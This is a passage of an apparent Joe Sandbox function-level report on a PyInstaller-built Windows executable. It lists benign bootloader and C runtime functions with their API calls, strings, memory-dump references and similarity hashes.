f, xrefs: 00007FF67D01134A

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction ID: d939ed03629346d9326cb0d4712d9bddff71f6a12f461de45e6f35e339dc6142
Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
Instruction Fuzzy Hash: B9129563E2C14386FB289F15E05467D7251FB40758F885B35E69A876C4EF7EF4808B22

Function 00007FF67D0015A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

Strings

malloc, xrefs: 00007FF67D001640
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF67D0016C2
fread, xrefs: 00007FF67D0016C9
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF67D001639
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF67D001609
fseek, xrefs: 00007FF67D001610
Failed to extract %s: failed to open archive file!, xrefs: 00007FF67D0015D3

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 761ce7a978ea73055f409a8efa6d9d3f94081396f2c7bd0fb59cc1d7c7ef1a6c
Instruction ID: 15655b8b6db1da0c43e9953311e23eb7f0a2ec5715f8cbebcb3c65a7336ed57d
Opcode Fuzzy Hash: 761ce7a978ea73055f409a8efa6d9d3f94081396f2c7bd0fb59cc1d7c7ef1a6c
Instruction Fuzzy Hash: 30319123B3964396EA24DF51A8001BA63A0EF047D8F586A32DE4DC7A99FE3CF541C700

Function 00007FF67D00EC00 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF67D00EC5D

Part of subcall function 00007FF67D00FB70: __GetUnwindTryBlock.LIBCMT ref: 00007FF67D00FBB3
Part of subcall function 00007FF67D00FB70: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF67D00FBD8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF67D00ED35
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF67D00EF8A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF67D00F096

Strings

csm, xrefs: 00007FF67D00EC77
csm, xrefs: 00007FF67D00ED58
csm, xrefs: 00007FF67D00ECDE

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
Instruction ID: a2726438e20925fc4180e48878b1accf76950024a1a7790042b8f4b08f98092f
Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
Instruction Fuzzy Hash: 99E18273A387459AEB209F2594802AD7BA0FB447C8F145A35EE4D97B95EF38F181C740

Function 00007FF67D0087B0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D008847
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D00889E

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF67D0088C6
WideCharToMultiByte, xrefs: 00007FF67D0088E6
win32_utils_to_utf8, xrefs: 00007FF67D0088D6
Out of memory., xrefs: 00007FF67D0088CF
Failed to get UTF-8 buffer size., xrefs: 00007FF67D0088DF

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 626452242-27947307
Opcode ID: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
Instruction ID: b1a7314ee8f7d1f9262b494fa2e9cc5a7a6d0ca6adb004b0325c2029fcdab231
Opcode Fuzzy Hash: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
Instruction Fuzzy Hash: C4419433A2DB4282E620DF15B84017AB7A1FB88794F546A35DA8D87B94EF3CF445D700

Function 00007FF67D008CF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D008D31

Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0

WideCharToMultiByte.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D008DA5

Strings

Failed to encode wchar_t as UTF-8., xrefs: 00007FF67D008DAF
WideCharToMultiByte, xrefs: 00007FF67D008D45, 00007FF67D008DB6
win32_utils_to_utf8, xrefs: 00007FF67D008D72
Out of memory., xrefs: 00007FF67D008D6B
Failed to get UTF-8 buffer size., xrefs: 00007FF67D008D3E

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
API String ID: 3723044601-27947307
Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
Instruction ID: 14f98e96da62e3736ceadfbc1d238a6c79d23b822262b627012619339fc42e98
Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
Instruction Fuzzy Hash: F1214B33A29B4295EA10DF26A8410797761FB94BD4B985B36DA4D87B94FF3CF901C380

Function 00007FF67D0075B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF67D007726

Part of subcall function 00007FF67D010350: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D010364

Part of subcall function 00007FF67D010324: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D010338

Strings

PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF67D007642
WARNING: file already exists but should not: %s, xrefs: 00007FF67D0076A8
%s%c%s, xrefs: 00007FF67D0075F5
ERROR: file already exists but should not: %s, xrefs: 00007FF67D00768C
\, xrefs: 00007FF67D0075FC

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
Instruction ID: 2c2170d2d0349d0c8535527074f68395a8cffa9d3d2f25816fe50bbe528276d1
Opcode Fuzzy Hash: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
Instruction Fuzzy Hash: FD51B323A3D64365FA60AF2599086BD6291AFC47C4F582B35E98DC77D6FE6CF8008340

Function 00007FF67D00DEB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DF3D
GetLastError.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DF4B
LoadLibraryExW.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DF75
FreeLibrary.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DFBB
GetProcAddress.KERNEL32(?,?,?,00007FF67D00E16A,?,?,?,00007FF67D00DE5C,?,?,00000001,00007FF67D00DA79), ref: 00007FF67D00DFC7

Strings

api-ms-, xrefs: 00007FF67D00DF5D

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
Instruction ID: 7cf784113a2504d594892460b0787468d0545cc0462567a7f25379714039764c
Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
Instruction Fuzzy Hash: 9931C122A3A742A4EA119F12A8006792394BF4CBE4F5D6F34DD1D9BB94FE3CF4418320

Function 00007FF67D007430 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF67D0079B1,00000000,?,00000000,00000000,?,00007FF67D00154F), ref: 00007FF67D00748F

Part of subcall function 00007FF67D002B30: MessageBoxW.USER32 ref: 00007FF67D002C05

Strings

LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF67D007466
LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF67D0074A3
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF67D0074EA

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
Instruction ID: 02977a623ff17e9c7f4454f9890e9d131dd5a3a2139441295602507ad5c49c1c
Opcode Fuzzy Hash: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
Instruction Fuzzy Hash: 3C31A713B3D78291FA21EF21E9553FA5251AF987C4F442E31DA8EC26D6FE2CF5048610

Function 00007FF67D008BE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008CA0

Strings

Failed to decode wchar_t from UTF-8, xrefs: 00007FF67D008CAA
Out of memory., xrefs: 00007FF67D008C62
MultiByteToWideChar, xrefs: 00007FF67D008C2E, 00007FF67D008CB1
win32_utils_from_utf8, xrefs: 00007FF67D008C69
Failed to get wchar_t buffer size., xrefs: 00007FF67D008C27

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
Instruction ID: 2239ff0baf3c397312b7fe25e2fbc438493c988069aef07b231ac0b44cc39ad7
Opcode Fuzzy Hash: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
Instruction Fuzzy Hash: 9C217323B29A4291EB50DF29F841069A361FB887D8B985A31DB4CC3B69FF3CF5418700

Function 00007FF67D01B810 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF67D01B81F
FlsGetValue.KERNEL32 ref: 00007FF67D01B834
FlsSetValue.KERNEL32 ref: 00007FF67D01B855
FlsSetValue.KERNEL32 ref: 00007FF67D01B882
FlsSetValue.KERNEL32 ref: 00007FF67D01B893
FlsSetValue.KERNEL32 ref: 00007FF67D01B8A4
SetLastError.KERNEL32 ref: 00007FF67D01B8BF

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: d6b3d2f040457b211bbd558a75f8735b46039f0c707bc714d8073d9d5dde1fa4
Instruction ID: ea25b9e31167ba5cf2c282d0bf660860f9eb8bd29ae5b75a51e6e2e0fb87583c
Opcode Fuzzy Hash: d6b3d2f040457b211bbd558a75f8735b46039f0c707bc714d8073d9d5dde1fa4
Instruction Fuzzy Hash: D5218023E2C64245FA256F71565113D2A529F45BB8F146F38D93DC76DAFF2EB4018300

Function 00007FF67D0286BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF67D0286ED
GetLastError.KERNEL32 ref: 00007FF67D0286F9
CloseHandle.KERNEL32 ref: 00007FF67D028711
CreateFileW.KERNEL32 ref: 00007FF67D02873C
WriteConsoleW.KERNEL32 ref: 00007FF67D02875B

Strings

CONOUT$, xrefs: 00007FF67D02871D

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
Instruction ID: d6d1559f9152673f83eba7e8c454ed49755a91e4132df6c0717618cca88c1420
Opcode Fuzzy Hash: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
Instruction Fuzzy Hash: EA118122A29B5186E7508F52E85472966A4FB88BE8F445734DA2DC77A4EF3CF4448740

Function 00007FF67D01B988 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01B997
FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01B9CD
FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01B9FA
FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01BA0B
FlsSetValue.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01BA1C
SetLastError.KERNEL32(?,?,?,00007FF67D0155CD,?,?,?,?,00007FF67D01F2BF,?,?,00000000,00007FF67D01BAA6,?,?,?), ref: 00007FF67D01BA37

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 536f357d1ee80c1e196f933d1d81fce24c1417f622f166844e4e845bffee9f59
Instruction ID: 45a18cd5b4acbd6a50eac7ea53895790b4fc702429005fc77054ced0c27097ba
Opcode Fuzzy Hash: 536f357d1ee80c1e196f933d1d81fce24c1417f622f166844e4e845bffee9f59
Instruction Fuzzy Hash: F0118C23E2D74246FA14AF71964127D2A925F457B8F446F38E93EC76DAFF6EB4024200

Function 00007FF67D00D878 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF67D00D8A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF67D00D938
RtlUnwindEx.KERNEL32 ref: 00007FF67D00D987

Strings

csm, xrefs: 00007FF67D00D91E
f, xrefs: 00007FF67D00D8B6

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
Instruction ID: f9543378fdd55ed37434ea44517c3f100bb90b29aad4c6965ebc95831ba608c3
Opcode Fuzzy Hash: 693f609b9fae876419381cc446d630854629708ee6e32f1efd9795666748e69d
Instruction Fuzzy Hash: 7751B133A39602A6D714CF15E404B693795FB84BD8F58AA34DA4E87B48FF78F8418724

Function 00007FF67D002600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF67D0027EF), ref: 00007FF67D002638
DialogBoxIndirectParamW.USER32 ref: 00007FF67D0026FC
DeleteObject.GDI32 ref: 00007FF67D00272F
DestroyIcon.USER32 ref: 00007FF67D002741

Strings

Unhandled exception in script, xrefs: 00007FF67D002668

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
Instruction ID: 22c6ed26e065af1d68735fcb715e70f77c1589594e0fe50526d7e6a5e8a65339
Opcode Fuzzy Hash: a3b5eef46e4e1fc382e5a4159730c6506ff8be504f9b8c49e81b7d5c4bb5797b
Instruction Fuzzy Hash: 27317033A29A8285EB20DF25E8551FD6760FF88788F401635EA4D8BB59EF3CE204C700

Function 00007FF67D0029E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14

Part of subcall function 00007FF67D008570: GetLastError.KERNEL32(00000000,00007FF67D002A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D008597
Part of subcall function 00007FF67D008570: FormatMessageW.KERNEL32 ref: 00007FF67D0085C6

Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

MessageBoxW.USER32 ref: 00007FF67D002AF0
MessageBoxA.USER32 ref: 00007FF67D002B0C

Strings

